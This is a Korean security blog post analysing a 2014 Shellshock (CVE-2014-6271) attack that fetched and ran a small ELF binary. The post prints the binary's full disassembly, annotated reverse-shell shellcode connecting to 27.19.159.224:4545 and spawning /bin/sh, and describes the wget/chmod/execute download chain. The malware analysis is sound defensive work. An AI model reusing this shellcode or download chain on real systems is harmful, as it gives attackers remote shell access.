Written by n0fate
on September 29, 2014

CVE-2014-6271 linux zero-day attack

취약점이 발표되고 하루 뒤, 리눅스 시스템을 대상으로 0day 공격이 시작되었다. 공격자는 HTTP 헤더 중 'User-Agents' 에 취약점을 삽입하여 다 수의 서버를 대상으로 공격을 수행하였다. 다음은 HTTP 요청 패킷 중 공격 코드만 잘라낸 것이다.

003

위 내용은 다음과 같은 명령을 수행한다.

wget으로 www.0rz.it의 fu4k 바이너리를 /tmp/fu4k 로 저장한다. 현재 저 주소는 막혀있다.
chmod로 저장한 악성코드에 실행 권한을 준다.
저장한 악성코드를 실행한다.

이 악성코드는 152바이트 크기를 가지는 매우 작은 바이너리로 코드를 분석해보면, 리버스 쉘을 제공하는 프로그램이다.

LOAD:08048000 ; Input MD5 : 2485040231A35B7A465361FAF92A512D
LOAD:08048000 ; Input CRC32 : 1F643AE0
LOAD:08048000
LOAD:08048000 ; File Name : /Users/n0fate/Dropbox/malware/Shellshock/fu4k/2485040231a35b7a465361faf92a512d
LOAD:08048000 ; Format : ELF for Intel 386 (Executable)
LOAD:08048000 ; Imagebase : 8048000
LOAD:08048000 ;
LOAD:08048000
LOAD:08048000 .686p
LOAD:08048000 .mmx
LOAD:08048000 .model flat
LOAD:08048000 .intel_syntax noprefix
LOAD:08048000
LOAD:08048000 ; ===========================================================================
LOAD:08048000
LOAD:08048000 ; Segment type: Pure code
LOAD:08048000 ; Segment permissions: Read/Write/Execute
LOAD:08048000 LOAD segment mempage public 'CODE' use32
LOAD:08048000 assume cs:LOAD
LOAD:08048000 ;org 8048000h
LOAD:08048000 assume es:nothing, ss:nothing, ds:LOAD, fs:nothing, gs:nothing
LOAD:08048000 dword_8048000 dd 464C457Fh, 10101h, 2 dup(0) ; DATA XREF: LOAD:0804803Co
LOAD:08048000 ; LOAD:08048040o
LOAD:08048010 dd 30002h, 1, 8048054h, 34h, 2 dup(0)
LOAD:08048028 dd 200034h, 1, 0
LOAD:08048034 dd 1, 0
LOAD:0804803C dd offset dword_8048000
LOAD:08048040 dd offset dword_8048000
LOAD:08048044 dd 98h, 0DCh, 7, 1000h
LOAD:08048054 ; ---------------------------------------------------------------------------
LOAD:08048054
LOAD:08048054 public start
LOAD:08048054 start:
LOAD:08048054 xor ebx, ebx
LOAD:08048056 mul ebx
LOAD:08048058 push ebx ; IPPROTO_IP
LOAD:08048059 inc ebx
LOAD:0804805A push ebx ; SOCK_STREAM
LOAD:0804805B push PF_INET ; https://github.com/xiam/harmful-stuff/blob/master/bind/bind-linux-x86.asm
LOAD:0804805D mov ecx, esp ; ecx*->stack_arguments
LOAD:0804805F mov al, 102 ; socketcall
LOAD:08048061 int 80h ; LINUX -
LOAD:08048063 xchg eax, ebx ; ebx = save socket file description
LOAD:08048064 pop ecx ; ecx = 2
LOAD:08048065
LOAD:08048065 connect: ; CODE XREF: LOAD:0804806Aj
LOAD:08048065 mov al, 63 ; dup2(socket, stderr/out/in)
LOAD:08048067 int 80h ; LINUX -
LOAD:08048069 dec ecx ; stderr, stdout, stdin (2,1,0)
LOAD:0804806A jns short connect ; connect to stdin/out/err description
LOAD:0804806C push 0E09F131Bh ; IP : 27.19.159.224
LOAD:08048071 push 0C1110002h ; Port : 0x11C1(4545)
LOAD:08048071 ; AF_INET : 0x0002
LOAD:08048076 mov ecx, esp ; server sockstruct
LOAD:08048078 mov al, 102 ; socketcall
LOAD:0804807A push eax ; 102 -> sizeof socket structure
LOAD:0804807B push ecx ; server struct pointer
LOAD:0804807C push ebx ; socket file descriptor
LOAD:0804807D mov bl, 3 ; _connect()
LOAD:0804807D ; connect(socket, [AF_INET, 4545, 27.19.159.224, 102])
LOAD:0804807F mov ecx, esp ; ecx -> argument array
LOAD:08048081 int 80h ; LINUX -
LOAD:08048083 push edx ; null
LOAD:08048084 push 'hs//'
LOAD:08048089 push 'nib/'
LOAD:0804808E mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp
LOAD:08048090 push edx ; NULL
LOAD:08048091 push ebx ; '/bin/sh'
LOAD:08048092 mov ecx, esp ; Pointer of {'/bin/sh, NULL}
LOAD:08048094 mov al, 11 ; execve
LOAD:08048094 ; execve('/bin//sh', ['/bin//sh', NULL]);
LOAD:08048096 int 80h ; LINUX -
LOAD:08048096 ; ---------------------------------------------------------------------------
LOAD:08048098 dd 11h dup(?) ; It's reverse shell
LOAD:08048098 LOAD ends ; http://www.backtrack-linux.org/forums/archive/index.php/t-51108.html
LOAD:08048098 ; ######################################################
LOAD:08048098 ; pseudo code:
LOAD:08048098 end start ;
LOAD:08048098 ; int i = 2
LOAD:08048098 ; int s = socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
LOAD:08048098 ; int iRet = 0
LOAD:08048098 ; while iRet != 0:
LOAD:08048098 ; dup2(s, i)
LOAD:08048098 ; i -= 1
LOAD:08048098 ;
LOAD:08048098 ; connect(s, [AF_INET, 4545, '27.19.159.224', 102])
LOAD:08048098 ; execve('/bin//sh', ['bin//sh', NULL], [NULL])
LOAD:08048098 ; ######################################################

공격자는 소켓을 stdin, stdout, stderr와 연결시키고 27.19.159.224:4545 에 연결을 시도한다. 이 서버는 중국에 있는 후한시에 있는 것으로 나타나 있다.

004

Reference

Malware Must Die!, Linux ELF bash 0day: The fun has only just begun..., http://blog.malwaremustdie.org/2014/09/linux-elf-bash-0day-fun-has-only-just.html

← → Top